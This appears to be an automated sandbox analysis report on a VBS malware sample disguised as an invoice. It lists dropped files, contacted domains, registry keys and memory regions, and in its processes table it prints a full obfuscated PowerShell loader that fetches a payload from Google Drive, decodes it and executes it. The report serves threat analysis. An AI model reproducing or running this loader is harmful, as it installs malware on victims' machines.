Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
FACTURA24021151 - BP.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e325cqtp.nie.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkgsi2od.zzf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\microdactylous.Aar
|
HTML document, ASCII text, with very long lines (1692), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function
Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional;
$Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){.
($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0
Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko
6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee
CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1
He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter
' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae
.tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp=
Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn
SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter
'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe
aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo
Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N
nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav
Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals
lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa
hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp
e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia
RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig,
Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro,
');Jardiniere (Fjter 'Nymar$S,ksaoSo,iavMicroeKomplrMorbipapotelRecipuPomacmH.tetpYvo,n.KommiHPathoe SupeaEjenddDialyeProbarAggrasCompo[Fiske$Orbi
MVinteaDekorsDiktek.ommaiOrthonUnsetkPagino .ntadVarleeIngrarOversnspille B ss]Anten= Sty,$TalmuH SalseUn.ecl.ampyt RegeaBronzlPell,skofoedDerm
i ProjvA.egrideflos Kreei nogtoAlpehn Perisarbe. ');$Catholicly=Fjter 'App,aoGen,nv HjoreBesoiruredtp,astrl Libeuoeve mVievapVaren.OvergDSy,enoH,lmewV,dtlnDyrehlStadso,egisasammedAriusF
.ektitu erlUnr ge,poke(Solen$.olleEBoundx,ostrePrsennGrittcPreheeRottep Div,hSociaa yvel NoncuVic,is Idea,Feltt$GenspHPr
vim Ratin FeweiForebn El,mgraads5 Part6Kaste) anus ';$Catholicly=$Fjerdedelsnoderne[1]+$Catholicly;$Hmning56=$Fjerdedelsnoderne[0];Jardiniere
(Fjter 'Helfa$ B,skg ionol Baa,oBandobDynebaIndkolRoman:Qui zUMembrnChorad ReeteDrypsrprot k Op keUlvemnTensidUbu.deSputtlCanoes
Be.keS rofsB ndb=Forto(AchloTAndedeCot esAandstEncli-ChaotPKat gaOplritMacrohS eti Pr.a$Art,yH FejlmIso.onFossiiQu.ntnT.ctog
Reg 5Growt6Shirt) Stri ');while (!$Underkendelses) {Jardiniere (Fjter ' For.$ BasigAgatil .olioArchebfagotawalk,lSakes:KrimiCSkar,aVelafu
Ek olidoliiLitigcNedruuBhutslBrevti skov=Relfo$Apocot,iscjr prinuProtoeAstri ') ;Jardiniere $Catholicly;Jardiniere (Fjter
' ntaiSRigsatAttriaAn.ierLoggetFiltr-Unp,lSWarkhlEftere etekeArbejp Linj Kawik4Inapp ');Jardiniere (Fjter ' ,ika$SylfigTeletlHemi
o patlbKasi aCruellMestr: LeylUCholen Phl,d CinteRevaprOolitk G,ldeAkvarnN dvudP,ayeeExtenlam.trsA moceRekursFre.m=Dan.e(K
imiTSun.oeColopsB andtBox u- AlloPB,odaaregult efeuhCun i aggra$ Kos,H,ynelmEmbryn ArthiMandsn BlesgLight5Indka6Sikke)Tilhr
') ;Jardiniere (Fjter 'Vurde$JernbgStrabl issoUnderb torfa BlomlU,nst:EskalTR ulerErgonidispohAffaleBrillmSpar iLoreno ZoopbDamevo,ursulSmattiS.aveoFinannTauro=Disfu$Racemg
M.lilTegneoMagnebsagfraBeslulFissi: BrukR s ame,eilekBiblir and eZygo.e Stjer Asyne everdAcce.eH,rbw+Besky+Under%Lisss$TungmG,reska
Ru.lnCockpgBannsrOligoe,olypl.hyto.GavstcSociaoRakkeuS ikanBil at Drak ') ;$Exencephalus=$Gangrel[$Trihemiobolion];}Jardiniere
(Fjter 'Repar$DemargSunscl BideoGlycob Chuma Cl.cl Natu:.tninGAlminaSext.l Udpaa aadncStevetBanjeoMetabpAdverh Ps,cl ryggeAculebSurwaiOctaht
B.azi,estrsMa.lg Afpud=Spe,i OpbygG Kirke,orspt Subh- DjrvCIntero Se,inOvergtFortjePar nnSk.altRece xtr$TumblHlibermHelafnMa
olia.tranCordigInt.r5Uddat6Epita ');Jardiniere (Fjter 'Bundf$OutrogJuniolBizaroBesvrb St,ra,urfulTykta: ibizOMonilpBittedOverta
VenatS.edieInforrDerobi Aftan Jul gD,stas AdvooRhi or SenddkonjanEsplaiCon.inLnintgeige.1 Ren 3 Kr,g7 Sk.a monos= Ful, Ceme[
lassSOpbl ySmartsD.osctKatj.esu scmStor,.RddikCExamioSlsetnIndbrv Dis eBook.r UdvitSent,]Repr.: Dope:PummeFSummarCarmoo ExodmFlintBAr
ejaPyo.es Aeroe sang6 Over4BestrSFamilt SondrFertii PolenBypasgHala,(Ratfi$Gi miGMitisaHo,osl BalaaKontocBnkbltSkibboBostop,randhFrem.l
Ca.te c,ilb NewbiEmbartEvindi,sychs Cao,)Betal ');Jardiniere (Fjter 'Lid,b$ConstgSweatlMinasoScripbHoveraU derl Ka,r:Mili.FCarlsu.efallCa,hedBushtgBadeloUre,mdLyk.seResen2
Mam 4 Ov,r4Imma H art=Phlog Mn.de[BindeSDrasty DetusSkilltHo.ogeRullemKnown.Omty Tasylre HellxSli.etHo ed.,ygniESeamsnDeserc
UnreoFornidS mmeibestnnGrammg P ni]Unint:Recen:BrnevABorstSditikC Raa,IBourgI For . lfenGplanaePre.rtFore.SUndertQuodlr SulfiBesm.nVitalg
Sger(Snigg$Sul.aODepilpUds,rdDidacaUler t Dapie Brsnr MaltiTr.konUndergSquansK,oldoAnticrAnteddSydafnCharsi,nplan bus,g Awa,1Kunde3
Plat7Dyref)Ouden ');Jardiniere (Fjter 'Endev$TheregskriglPinnaoEfterb Ext aFrikel Efte: SagsBEpikujInspae hy.rr Unc.gsundhe
rat rGnomos,augh=Fo de$SammeFSuppeuKrantlSnobodDetong ,ervoBrochdUnreceSlaae2 Soli4 Se v4Stueg. Met sPol.tuFor ubSulphs CondtTilfarBestriUndernT
aadgSpurv(Huski3Semes2haras7Frime1Ra en6Ind p4Erant, Ajou2Lath 7cring1Amora9Gluie6Koble) Muni ');Jardiniere $Bjergers;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\microdactylous.Aar && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.google.comP
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
173.194.219.101
|
||
|
drive.usercontent.google.com
|
142.251.15.132
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.251.15.132
|
drive.usercontent.google.com
|
United States
|
||
|
173.194.219.101
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1B413723000
|
heap
|
page read and write
|
||
|
1B4135A9000
|
heap
|
page read and write
|
||
|
1B4137C6000
|
heap
|
page read and write
|
||
|
1B4136DD000
|
heap
|
page read and write
|
||
|
1B4136C0000
|
heap
|
page read and write
|
||
|
2B8429E1000
|
heap
|
page read and write
|
||
|
1B413706000
|
heap
|
page read and write
|
||
|
1B4139BF000
|
heap
|
page read and write
|
||
|
1B4139D6000
|
heap
|
page read and write
|
||
|
1B413B70000
|
remote allocation
|
page read and write
|
||
|
1B411788000
|
heap
|
page read and write
|
||
|
1B4136BB000
|
heap
|
page read and write
|
||
|
1B4135C8000
|
heap
|
page read and write
|
||
|
1B41370B000
|
heap
|
page read and write
|
||
|
1B413581000
|
heap
|
page read and write
|
||
|
1BEBE7AB000
|
heap
|
page read and write
|
||
|
1B413701000
|
heap
|
page read and write
|
||
|
1B413579000
|
heap
|
page read and write
|
||
|
DAA8E77000
|
stack
|
page read and write
|
||
|
1B413575000
|
heap
|
page read and write
|
||
|
1B413780000
|
heap
|
page read and write
|
||
|
2B8289F0000
|
heap
|
page read and write
|
||
|
1B4136D5000
|
heap
|
page read and write
|
||
|
1B4117C0000
|
heap
|
page read and write
|
||
|
1BEBE7A0000
|
heap
|
page read and write
|
||
|
1B41359B000
|
heap
|
page read and write
|
||
|
1B413713000
|
heap
|
page read and write
|
||
|
2B828AA0000
|
trusted library allocation
|
page read and write
|
||
|
1B413C41000
|
heap
|
page read and write
|
||
|
1B41356A000
|
heap
|
page read and write
|
||
|
7987CFB000
|
stack
|
page read and write
|
||
|
1B413BA1000
|
heap
|
page read and write
|
||
|
1B4139CD000
|
heap
|
page read and write
|
||
|
1B4117AF000
|
heap
|
page read and write
|
||
|
2B82C591000
|
trusted library allocation
|
page read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
2B82C498000
|
trusted library allocation
|
page read and write
|
||
|
1B4136C0000
|
heap
|
page read and write
|
||
|
1B41381D000
|
heap
|
page read and write
|
||
|
2B828845000
|
heap
|
page read and write
|
||
|
2B83A93D000
|
trusted library allocation
|
page read and write
|
||
|
2B82C68E000
|
trusted library allocation
|
page read and write
|
||
|
1B4135F5000
|
heap
|
page read and write
|
||
|
1B4135E4000
|
heap
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
1B4135C6000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
1B41381D000
|
heap
|
page read and write
|
||
|
1B411828000
|
heap
|
page read and write
|
||
|
2B82BF09000
|
trusted library allocation
|
page read and write
|
||
|
2B83A660000
|
trusted library allocation
|
page read and write
|
||
|
1B4135BE000
|
heap
|
page read and write
|
||
|
1B41381D000
|
heap
|
page read and write
|
||
|
1B4137F3000
|
heap
|
page read and write
|
||
|
1B4139BD000
|
heap
|
page read and write
|
||
|
DAA87DE000
|
stack
|
page read and write
|
||
|
1B4116C0000
|
heap
|
page read and write
|
||
|
1B4135A7000
|
heap
|
page read and write
|
||
|
1B4137FE000
|
heap
|
page read and write
|
||
|
1B413790000
|
heap
|
page read and write
|
||
|
1B4139CD000
|
heap
|
page read and write
|
||
|
2B842B6C000
|
heap
|
page read and write
|
||
|
1B413550000
|
heap
|
page read and write
|
||
|
1B4137DB000
|
heap
|
page read and write
|
||
|
1B4135F0000
|
heap
|
page read and write
|
||
|
2B82AAD3000
|
trusted library allocation
|
page read and write
|
||
|
1BEBE5E0000
|
heap
|
page read and write
|
||
|
2B82AF32000
|
trusted library allocation
|
page read and write
|
||
|
1B4138FA000
|
heap
|
page read and write
|
||
|
2B82AAC8000
|
trusted library allocation
|
page read and write
|
||
|
1B4136C0000
|
heap
|
page read and write
|
||
|
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B82AB43000
|
trusted library allocation
|
page read and write
|
||
|
2B842AC0000
|
heap
|
page read and write
|
||
|
79873FE000
|
stack
|
page read and write
|
||
|
1B413701000
|
heap
|
page read and write
|
||
|
1B413592000
|
heap
|
page read and write
|
||
|
DAA8A7E000
|
stack
|
page read and write
|
||
|
1B4139A5000
|
heap
|
page read and write
|
||
|
1B41176A000
|
heap
|
page read and write
|
||
|
1B4137CE000
|
heap
|
page read and write
|
||
|
1B4135F8000
|
heap
|
page read and write
|
||
|
DAA8FFE000
|
stack
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
2B828853000
|
heap
|
page read and write
|
||
|
1B413751000
|
heap
|
page read and write
|
||
|
7987AFE000
|
stack
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
1B413AD4000
|
heap
|
page read and write
|
||
|
1B4137EE000
|
heap
|
page read and write
|
||
|
1B4139C4000
|
heap
|
page read and write
|
||
|
1B41398A000
|
heap
|
page read and write
|
||
|
1B41184E000
|
heap
|
page read and write
|
||
|
2B82A877000
|
trusted library allocation
|
page read and write
|
||
|
1B413981000
|
heap
|
page read and write
|
||
|
1B413769000
|
heap
|
page read and write
|
||
|
2B82AADB000
|
trusted library allocation
|
page read and write
|
||
|
1B4139C4000
|
heap
|
page read and write
|
||
|
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
|
1B4139C4000
|
heap
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B4136BC000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
1B4137F6000
|
heap
|
page read and write
|
||
|
1B4135DF000
|
heap
|
page read and write
|
||
|
1B413586000
|
heap
|
page read and write
|
||
|
1B4136A7000
|
heap
|
page read and write
|
||
|
DAA8C7E000
|
stack
|
page read and write
|
||
|
1B41359A000
|
heap
|
page read and write
|
||
|
1B4136A7000
|
heap
|
page read and write
|
||
|
1BEBE6E0000
|
heap
|
page read and write
|
||
|
1B4135F5000
|
heap
|
page read and write
|
||
|
1B413950000
|
heap
|
page read and write
|
||
|
7987BFE000
|
stack
|
page read and write
|
||
|
2B82A400000
|
heap
|
page read and write
|
||
|
1BEBE6C0000
|
heap
|
page read and write
|
||
|
2B82C403000
|
trusted library allocation
|
page read and write
|
||
|
1B4137EB000
|
heap
|
page read and write
|
||
|
1B411765000
|
heap
|
page read and write
|
||
|
1B413200000
|
heap
|
page read and write
|
||
|
1B4139AD000
|
heap
|
page read and write
|
||
|
7FF848E12000
|
trusted library allocation
|
page read and write
|
||
|
7DF4E6CD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
DAA90FE000
|
stack
|
page read and write
|
||
|
1B413576000
|
heap
|
page read and write
|
||
|
2B82AB3F000
|
trusted library allocation
|
page read and write
|
||
|
1B4136DD000
|
heap
|
page read and write
|
||
|
2B82C3FF000
|
trusted library allocation
|
page read and write
|
||
|
1B4137CB000
|
heap
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
1B41365F000
|
heap
|
page read and write
|
||
|
2B82AAEC000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
1B41359F000
|
heap
|
page read and write
|
||
|
1B4139AD000
|
heap
|
page read and write
|
||
|
1B4136EA000
|
heap
|
page read and write
|
||
|
1B41355A000
|
heap
|
page read and write
|
||
|
2B82C7A4000
|
trusted library allocation
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
1B413709000
|
heap
|
page read and write
|
||
|
1B4137FB000
|
heap
|
page read and write
|
||
|
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B82AABF000
|
trusted library allocation
|
page read and write
|
||
|
1B413759000
|
heap
|
page read and write
|
||
|
1B411768000
|
heap
|
page read and write
|
||
|
1B4139AD000
|
heap
|
page read and write
|
||
|
1B4136BA000
|
heap
|
page read and write
|
||
|
1B4135AA000
|
heap
|
page read and write
|
||
|
1B4135C3000
|
heap
|
page read and write
|
||
|
1B41399C000
|
heap
|
page read and write
|
||
|
1B413989000
|
heap
|
page read and write
|
||
|
2B82A4FF000
|
heap
|
page read and write
|
||
|
1B4136F0000
|
heap
|
page read and write
|
||
|
1B4136B0000
|
heap
|
page read and write
|
||
|
1B4136D5000
|
heap
|
page read and write
|
||
|
1B413AD4000
|
heap
|
page read and write
|
||
|
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B828B30000
|
heap
|
page execute and read and write
|
||
|
2B828B37000
|
heap
|
page execute and read and write
|
||
|
2B82884D000
|
heap
|
page read and write
|
||
|
1B4135F4000
|
heap
|
page read and write
|
||
|
1B41358E000
|
heap
|
page read and write
|
||
|
1B4135D3000
|
heap
|
page read and write
|
||
|
79875FF000
|
stack
|
page read and write
|
||
|
1B413551000
|
heap
|
page read and write
|
||
|
1B413551000
|
heap
|
page read and write
|
||
|
2B842B37000
|
heap
|
page read and write
|
||
|
2B83A805000
|
trusted library allocation
|
page read and write
|
||
|
1B4139CD000
|
heap
|
page read and write
|
||
|
2B82C417000
|
trusted library allocation
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
1B413815000
|
heap
|
page read and write
|
||
|
1B4135B2000
|
heap
|
page read and write
|
||
|
1B41359C000
|
heap
|
page read and write
|
||
|
2B82A4E4000
|
heap
|
page read and write
|
||
|
79877FB000
|
stack
|
page read and write
|
||
|
1B4135F6000
|
heap
|
page read and write
|
||
|
1B4137B2000
|
heap
|
page read and write
|
||
|
2B82A455000
|
heap
|
page read and write
|
||
|
2B82B932000
|
trusted library allocation
|
page read and write
|
||
|
1B4138FA000
|
heap
|
page read and write
|
||
|
1B4137AF000
|
heap
|
page read and write
|
||
|
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
|
1B4135F9000
|
heap
|
page read and write
|
||
|
1B413703000
|
heap
|
page read and write
|
||
|
1B4135F8000
|
heap
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
DAA879E000
|
stack
|
page read and write
|
||
|
1B413586000
|
heap
|
page read and write
|
||
|
1B413972000
|
heap
|
page read and write
|
||
|
1B413572000
|
heap
|
page read and write
|
||
|
2B82C43D000
|
trusted library allocation
|
page read and write
|
||
|
DAA917B000
|
stack
|
page read and write
|
||
|
DAA8693000
|
stack
|
page read and write
|
||
|
1B411864000
|
heap
|
page read and write
|
||
|
1B41381D000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
2B82AAD7000
|
trusted library allocation
|
page read and write
|
||
|
1B4139A8000
|
heap
|
page read and write
|
||
|
2B82AECB000
|
trusted library allocation
|
page read and write
|
||
|
1B413995000
|
heap
|
page read and write
|
||
|
1B413650000
|
heap
|
page read and write
|
||
|
2B842B21000
|
heap
|
page read and write
|
||
|
1B4135F5000
|
heap
|
page read and write
|
||
|
2B82AB01000
|
trusted library allocation
|
page read and write
|
||
|
1BEBE9D5000
|
heap
|
page read and write
|
||
|
2B8288F1000
|
heap
|
page read and write
|
||
|
1B413575000
|
heap
|
page read and write
|
||
|
1B41359C000
|
heap
|
page read and write
|
||
|
1B4139A8000
|
heap
|
page read and write
|
||
|
1B4139B9000
|
heap
|
page read and write
|
||
|
1B4136BC000
|
heap
|
page read and write
|
||
|
2B82C42A000
|
trusted library allocation
|
page read and write
|
||
|
1B41380E000
|
heap
|
page read and write
|
||
|
1B4137A8000
|
heap
|
page read and write
|
||
|
1B41185D000
|
heap
|
page read and write
|
||
|
1B413680000
|
heap
|
page read and write
|
||
|
1B41380E000
|
heap
|
page read and write
|
||
|
DAA8EFC000
|
stack
|
page read and write
|
||
|
2B82C426000
|
trusted library allocation
|
page read and write
|
||
|
1B413BA0000
|
heap
|
page read and write
|
||
|
1B4135F5000
|
heap
|
page read and write
|
||
|
2B828B40000
|
heap
|
page read and write
|
||
|
1B41375C000
|
heap
|
page read and write
|
||
|
1B41381D000
|
heap
|
page read and write
|
||
|
1B4139AD000
|
heap
|
page read and write
|
||
|
1B41377D000
|
heap
|
page read and write
|
||
|
1B413553000
|
heap
|
page read and write
|
||
|
2B82A40A000
|
heap
|
page read and write
|
||
|
41FF2FF000
|
unkown
|
page read and write
|
||
|
1B4135AF000
|
heap
|
page read and write
|
||
|
1B413A60000
|
heap
|
page read and write
|
||
|
1B413553000
|
heap
|
page read and write
|
||
|
1B413586000
|
heap
|
page read and write
|
||
|
1B413774000
|
heap
|
page read and write
|
||
|
2B828A60000
|
trusted library allocation
|
page read and write
|
||
|
1B4139B9000
|
heap
|
page read and write
|
||
|
1BEBE9D4000
|
heap
|
page read and write
|
||
|
DAA8CFE000
|
stack
|
page read and write
|
||
|
1B413A11000
|
heap
|
page read and write
|
||
|
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B828A20000
|
heap
|
page read and write
|
||
|
2B842DD0000
|
heap
|
page read and write
|
||
|
2B828851000
|
heap
|
page read and write
|
||
|
1B4137D6000
|
heap
|
page read and write
|
||
|
1B4135CB000
|
heap
|
page read and write
|
||
|
2B82AACA000
|
trusted library allocation
|
page read and write
|
||
|
1B4137A0000
|
heap
|
page read and write
|
||
|
2B828817000
|
heap
|
page read and write
|
||
|
1B4136B0000
|
heap
|
page read and write
|
||
|
1B4117B6000
|
heap
|
page read and write
|
||
|
2B82A640000
|
heap
|
page execute and read and write
|
||
|
DAA8B7D000
|
stack
|
page read and write
|
||
|
1B4135BB000
|
heap
|
page read and write
|
||
|
1B4136C0000
|
heap
|
page read and write
|
||
|
1B4136BC000
|
heap
|
page read and write
|
||
|
1B4136F0000
|
heap
|
page read and write
|
||
|
41FEF9D000
|
stack
|
page read and write
|
||
|
1B4135F8000
|
heap
|
page read and write
|
||
|
1B4137E6000
|
heap
|
page read and write
|
||
|
7FF849190000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
1B4116E0000
|
heap
|
page read and write
|
||
|
2B828800000
|
heap
|
page read and write
|
||
|
1B41176C000
|
heap
|
page read and write
|
||
|
DAA9B4E000
|
stack
|
page read and write
|
||
|
1B41356D000
|
heap
|
page read and write
|
||
|
2B82A4C0000
|
heap
|
page read and write
|
||
|
1B413764000
|
heap
|
page read and write
|
||
|
1B413651000
|
heap
|
page read and write
|
||
|
1B413565000
|
heap
|
page read and write
|
||
|
1B4135F8000
|
heap
|
page read and write
|
||
|
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
|
1B411780000
|
heap
|
page read and write
|
||
|
2B82A2F9000
|
heap
|
page read and write
|
||
|
2B83A651000
|
trusted library allocation
|
page read and write
|
||
|
7986FA9000
|
stack
|
page read and write
|
||
|
1B4136BC000
|
heap
|
page read and write
|
||
|
1B411864000
|
heap
|
page read and write
|
||
|
2B83A94C000
|
trusted library allocation
|
page read and write
|
||
|
2B8287E0000
|
heap
|
page read and write
|
||
|
1B41378D000
|
heap
|
page read and write
|
||
|
1B4135F8000
|
heap
|
page read and write
|
||
|
1B413B70000
|
remote allocation
|
page read and write
|
||
|
1B413572000
|
heap
|
page read and write
|
||
|
1B413795000
|
heap
|
page read and write
|
||
|
1B4135A2000
|
heap
|
page read and write
|
||
|
1B4136F8000
|
heap
|
page read and write
|
||
|
1B4135F5000
|
heap
|
page read and write
|
||
|
DAA907E000
|
stack
|
page read and write
|
||
|
2B83A6C3000
|
